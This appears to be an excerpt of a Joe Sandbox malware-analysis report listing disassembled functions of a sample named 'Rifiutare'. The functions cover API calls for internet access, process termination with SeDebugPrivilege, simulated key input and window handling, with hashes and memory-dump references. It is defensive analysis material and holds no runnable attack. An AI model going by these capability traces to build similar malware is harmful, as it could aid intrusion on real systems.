                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                • String ID:
                                                                                • API String ID: 1282221369-0
                                                                                • Opcode ID: cc1ffc53dd5fe51a3b3de772701784d30643f3e8a1b60ebfbcd261b601fc210a
                                                                                • Instruction ID: 7e30beaa874bd89eacf3a65f28e1d1163470d7da089ddc361eb90af544008030
                                                                                • Opcode Fuzzy Hash: cc1ffc53dd5fe51a3b3de772701784d30643f3e8a1b60ebfbcd261b601fc210a
                                                                                • Instruction Fuzzy Hash: C961F471F00B05ABDB31AF7488C1A7D7BA4AF01350F14426DF956E73A1EA319E0297A1
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00CC5862
                                                                                • ShowWindow.USER32(?,00000000), ref: 00CC58A3
                                                                                • ShowWindow.USER32(?,00000005,?,00000000), ref: 00CC58A9
                                                                                • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00CC58AD
                                                                                  • Part of subcall function 00CC75A1: DeleteObject.GDI32(00000000), ref: 00CC75CD
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00CC58E9
                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00CC58F6
                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00CC5929
                                                                                • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00CC5963
                                                                                • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00CC5972
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                • String ID:
                                                                                • API String ID: 3210457359-0
                                                                                • Opcode ID: 098204e191840f9a7d09fa9035d274811c23f3851fdd881decd7923c98b977e8
                                                                                • Instruction ID: 24e9c3273b7c453da024e343dae2e9138e54aa7fa28a4ca85e2d1b3c0494bead
                                                                                • Opcode Fuzzy Hash: 098204e191840f9a7d09fa9035d274811c23f3851fdd881decd7923c98b977e8
                                                                                • Instruction Fuzzy Hash: 9B518030A91A08FFEF309F19CC49F993B65EB04360F14415AF925961E1C775BAD1EB41
                                                                                APIs
                                                                                • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00C72B05
                                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00C72B27
                                                                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00C72B3F
                                                                                • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00C72B5D
                                                                                • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00C72B7E
                                                                                • DestroyIcon.USER32(00000000,?,?,?,?,?,00C3143A,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00C72B8D
                                                                                • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00C72BAA
                                                                                • DestroyIcon.USER32(00000000,?,?,?,?,?,00C3143A,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00C72BB9
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                • String ID:
                                                                                • API String ID: 1268354404-0
                                                                                • Opcode ID: 4ff874f8f805d0e6876d68b05065c7af6d41c3f037cdda4420d629116f104394
                                                                                • Instruction ID: c8771e0510a9343b7577134f7d4d709c1e18b7daf99fe68ac83e08d696ab29d1
                                                                                • Opcode Fuzzy Hash: 4ff874f8f805d0e6876d68b05065c7af6d41c3f037cdda4420d629116f104394
                                                                                • Instruction Fuzzy Hash: 7D517A70610209EFDB20DF65DC86FAA7BB9EB48710F144528F956D72A0D770EE90DB60
                                                                                APIs
                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00CAC9B5
                                                                                • GetLastError.KERNEL32 ref: 00CAC9C8
                                                                                • SetEvent.KERNEL32(?), ref: 00CAC9DC
                                                                                  • Part of subcall function 00CACA86: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00CACAA5
                                                                                  • Part of subcall function 00CACA86: GetLastError.KERNEL32 ref: 00CACB55
                                                                                  • Part of subcall function 00CACA86: SetEvent.KERNEL32(?), ref: 00CACB69
                                                                                  • Part of subcall function 00CACA86: InternetCloseHandle.WININET(00000000), ref: 00CACB74
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                • String ID:
                                                                                • API String ID: 337547030-0
                                                                                • Opcode ID: 9eb87119031acf788e8e054284c2cbeca580a83b1c3250c81e5eb8e197d7b226
                                                                                • Instruction ID: f7451f70a73077a5a0b1d56138e938296722e8294c3470d7ba9ef54d74e4956b
                                                                                • Opcode Fuzzy Hash: 9eb87119031acf788e8e054284c2cbeca580a83b1c3250c81e5eb8e197d7b226
                                                                                • Instruction Fuzzy Hash: 93315E7150170AAFDB218F75DC84B7ABBF8FF4A304B048529F956C2610D731DD11ABA0
                                                                                APIs
                                                                                  • Part of subcall function 00C94251: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C9426B
                                                                                  • Part of subcall function 00C94251: GetCurrentThreadId.KERNEL32 ref: 00C94272
                                                                                  • Part of subcall function 00C94251: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00C92DB3), ref: 00C94279
                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C92DBD
                                                                                • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00C92DDB
                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00C92DDF
                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C92DE9
                                                                                • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00C92E01
                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00C92E05
                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C92E0F
                                                                                • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00C92E23
                                                                                • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00C92E27
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                • String ID:
                                                                                • API String ID: 2014098862-0
                                                                                • Opcode ID: a128cf3c7990963d3bceabbe1935149c8af73fd000edd7742098e792761a3bde
                                                                                • Instruction ID: 2d6221b85e0844c1ef3dac749359e535fafdfa150307b00c741477bcb653a90b
                                                                                • Opcode Fuzzy Hash: a128cf3c7990963d3bceabbe1935149c8af73fd000edd7742098e792761a3bde
                                                                                • Instruction Fuzzy Hash: 8F0128307806107BFB106768CCCEF5D3F59EF49B12F110015F319AE0E0C9E25400DA69
                                                                                APIs
                                                                                • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00C91CC3,?,?,00000000), ref: 00C92086
                                                                                • HeapAlloc.KERNEL32(00000000,?,00C91CC3,?,?,00000000), ref: 00C9208D
                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C91CC3,?,?,00000000), ref: 00C920A2
                                                                                • GetCurrentProcess.KERNEL32(?,00000000,?,00C91CC3,?,?,00000000), ref: 00C920AA
                                                                                • DuplicateHandle.KERNEL32(00000000,?,00C91CC3,?,?,00000000), ref: 00C920AD
                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C91CC3,?,?,00000000), ref: 00C920BD
                                                                                • GetCurrentProcess.KERNEL32(00C91CC3,00000000,?,00C91CC3,?,?,00000000), ref: 00C920C5
                                                                                • DuplicateHandle.KERNEL32(00000000,?,00C91CC3,?,?,00000000), ref: 00C920C8
                                                                                • CreateThread.KERNEL32(00000000,00000000,00C920EE,00000000,00000000,00000000), ref: 00C920E2
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                • String ID:
                                                                                • API String ID: 1957940570-0
                                                                                • Opcode ID: ffa74d26459e7f169a35dbbd5cedfe0b636a5dbcc2cc1c683cc3ca3cf10191da
                                                                                • Instruction ID: b3235a6a3bd73126d1ec0f3a048a3fc67c7893d8b0796462a826c64db4df7ab3
                                                                                • Opcode Fuzzy Hash: ffa74d26459e7f169a35dbbd5cedfe0b636a5dbcc2cc1c683cc3ca3cf10191da
                                                                                • Instruction Fuzzy Hash: 2601BBB5240348BFE710ABA5DC4DF6F7BACEB88711F058425FA05DB1A1CA70D800CB20
                                                                                APIs
                                                                                  • Part of subcall function 00C9DC3E: CreateToolhelp32Snapshot.KERNEL32 ref: 00C9DC63
                                                                                  • Part of subcall function 00C9DC3E: Process32FirstW.KERNEL32(00000000,?), ref: 00C9DC71
                                                                                  • Part of subcall function 00C9DC3E: CloseHandle.KERNEL32(00000000), ref: 00C9DD49
                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00CBA8DF
                                                                                • GetLastError.KERNEL32 ref: 00CBA8F2
                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00CBA925
                                                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 00CBA9DA
                                                                                • GetLastError.KERNEL32(00000000), ref: 00CBA9E5
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00CBAA36
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                • String ID: SeDebugPrivilege
                                                                                • API String ID: 2533919879-2896544425
                                                                                • Opcode ID: 6e2144696bcfc649221e414a0146a23b222a293b97ba7e8e702df11907fb7734
                                                                                • Instruction ID: dab478789be323b155071ecb902339fce90752fc66885661c718ae3c647495a7
                                                                                • Opcode Fuzzy Hash: 6e2144696bcfc649221e414a0146a23b222a293b97ba7e8e702df11907fb7734
                                                                                • Instruction Fuzzy Hash: 0961C230204242AFD720DF15C594F6ABBE0AF44318F19849CE4A68FBA3C775ED45DB92
                                                                                APIs
                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C9C56F
                                                                                • IsMenu.USER32(00000000), ref: 00C9C58F
                                                                                • CreatePopupMenu.USER32 ref: 00C9C5C5
                                                                                • GetMenuItemCount.USER32(017B4310), ref: 00C9C616
                                                                                • InsertMenuItemW.USER32(017B4310,?,00000001,00000030), ref: 00C9C63E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                • String ID: 0$2
                                                                                • API String ID: 93392585-3793063076
                                                                                • Opcode ID: cb57c74da126f1930d59172c7eef70afd1185e4d4f8ee2f0952535141c5f99b6
                                                                                • Instruction ID: 833f4336be136717433f089e89cd9a2946f11303df3b55e308d829208a9e4014
                                                                                • Opcode Fuzzy Hash: cb57c74da126f1930d59172c7eef70afd1185e4d4f8ee2f0952535141c5f99b6
                                                                                • Instruction Fuzzy Hash: 6C519DB0A00345EBDF10CF68D9C8BAEBBF4AF59354F248129F426E7291D7709A41DB61
                                                                                APIs
                                                                                • LoadIconW.USER32(00000000,00007F03), ref: 00C9D069
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: IconLoad
                                                                                • String ID: blank$info$question$stop$warning
                                                                                • API String ID: 2457776203-404129466
                                                                                • Opcode ID: b5c383c633e6cc9d2c51830282c8998c4f2ccc7820bf667cd54c88d3f91ff264
                                                                                • Instruction ID: eb64796d53097d71b56d526da634871659981dec01cae4e6140e4acdcc6e4d57
                                                                                • Opcode Fuzzy Hash: b5c383c633e6cc9d2c51830282c8998c4f2ccc7820bf667cd54c88d3f91ff264
                                                                                • Instruction Fuzzy Hash: 1B11E73624830ABAEB165B55DC87D6AB79CAF15324F20007AFA02B71C1DAF29A814165
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                • String ID: 0.0.0.0
                                                                                • API String ID: 642191829-3771769585
                                                                                • Opcode ID: f4683d3bfa318329ceb6f62a7839c15b6348e3cee36dfaced278fa22026d36bf
                                                                                • Instruction ID: e6b40704298d6052cf5eb1ea5ef13f7a1eb7ae6e0af9c0c9f6a3de2a2bd475ad
                                                                                • Opcode Fuzzy Hash: f4683d3bfa318329ceb6f62a7839c15b6348e3cee36dfaced278fa22026d36bf
                                                                                • Instruction Fuzzy Hash: B611DF71904218ABCB24AB61DC0AFEE77BCEB60711F0400B9F912A6091EF708AC59A59
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen$LocalTime
                                                                                • String ID:
                                                                                • API String ID: 952045576-0
                                                                                • Opcode ID: 43565fc13be1f4026d5dbeee964bd012d86e39c88218aa60f663429bc2d4a297
                                                                                • Instruction ID: f01cf64f55e8f42ac4752defab15954ac85dbf4499ec2d25578fd0671f0e0a9a
                                                                                • Opcode Fuzzy Hash: 43565fc13be1f4026d5dbeee964bd012d86e39c88218aa60f663429bc2d4a297
                                                                                • Instruction Fuzzy Hash: 6E419F69C10214A5CB11EBF4C84AECEB7BCAF05341F508466F919E3161FA34D39ACBA9
                                                                                APIs
                                                                                • DeleteObject.GDI32(00000000), ref: 00CC33F5
                                                                                • GetDC.USER32(00000000), ref: 00CC33FD
                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CC3408
                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00CC3414
                                                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00CC3450
                                                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00CC3461
                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00CC6141,?,?,000000FF,00000000,?,000000FF,?), ref: 00CC349C
                                                                                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00CC34BB
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                • String ID:
                                                                                • API String ID: 3864802216-0
                                                                                • Opcode ID: 9885ba8bb38285d5f0919bad3eb9fed231d9b43d02e55bce62d25de3b8192762
                                                                                • Instruction ID: a4a508cb8b5b5346eed0a498ccedac90d84f942b96c626ac94a6932281f73410
                                                                                • Opcode Fuzzy Hash: 9885ba8bb38285d5f0919bad3eb9fed231d9b43d02e55bce62d25de3b8192762
                                                                                • Instruction Fuzzy Hash: 73319C72201624BFEB158F14DC8AFEB3FA9EF49711F044065FE099A291C6759D41CBA0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: NULL Pointer assignment$Not an Object type
                                                                                • API String ID: 0-572801152
                                                                                • Opcode ID: 3cb256317f900e5ce5992b8aaeb31d09dbf5292fc9fb584ebe7e6340e9ce0ce4
                                                                                • Instruction ID: 095660149145f3e8d10397b636d49c15a40e21d69877d12717d7123e37675b69
                                                                                • Opcode Fuzzy Hash: 3cb256317f900e5ce5992b8aaeb31d09dbf5292fc9fb584ebe7e6340e9ce0ce4
                                                                                • Instruction Fuzzy Hash: 6ED1B071A0060AAFDF10DFA8C881FEEB7B5BF48314F148069E915AB281E771DE45CB60
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$ClearInit
                                                                                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                • API String ID: 2610073882-625585964
                                                                                • Opcode ID: 3a803a3520ea6858fe046db46ed0458e846423166b6e6bbf77fb1bd5346be9b5
                                                                                • Instruction ID: 6a53ba4a3afee939e4f72c665d7fe4fa6a3a42bc46879b192984a7bd539facf5
                                                                                • Opcode Fuzzy Hash: 3a803a3520ea6858fe046db46ed0458e846423166b6e6bbf77fb1bd5346be9b5
                                                                                • Instruction Fuzzy Hash: 44919C71A04219ABDF28CFA5C848FEEBBB8FF45714F108559F515AB282D7709A44CFA0
                                                                                APIs
                                                                                • VariantInit.OLEAUT32(?), ref: 00CB413E
                                                                                • CharUpperBuffW.USER32(?,?), ref: 00CB424D
                                                                                • _wcslen.LIBCMT ref: 00CB425D
                                                                                • VariantClear.OLEAUT32(?), ref: 00CB43F2
                                                                                  • Part of subcall function 00CA1570: VariantInit.OLEAUT32(00000000), ref: 00CA15B0
                                                                                  • Part of subcall function 00CA1570: VariantCopy.OLEAUT32(?,?), ref: 00CA15B9
                                                                                  • Part of subcall function 00CA1570: VariantClear.OLEAUT32(?), ref: 00CA15C5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                • API String ID: 4137639002-1221869570
                                                                                • Opcode ID: affe6d3d8e9f950481cdb7e0b0039f8d93f7b1d71b9a14254330eab6c99c0a8a
                                                                                • Instruction ID: d33b579cc56b87f0df375d3cd7630399ccf59bcb8898998ca358afa46f4ba74b
                                                                                • Opcode Fuzzy Hash: affe6d3d8e9f950481cdb7e0b0039f8d93f7b1d71b9a14254330eab6c99c0a8a
                                                                                • Instruction Fuzzy Hash: EE914874A083019FCB08DF68C48096AB7E5FF89714F14892DF89A97352DB31EE45DB92
                                                                                APIs
                                                                                  • Part of subcall function 00C9082D: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C90760,80070057,?,?,?,00C90B7D), ref: 00C9084A
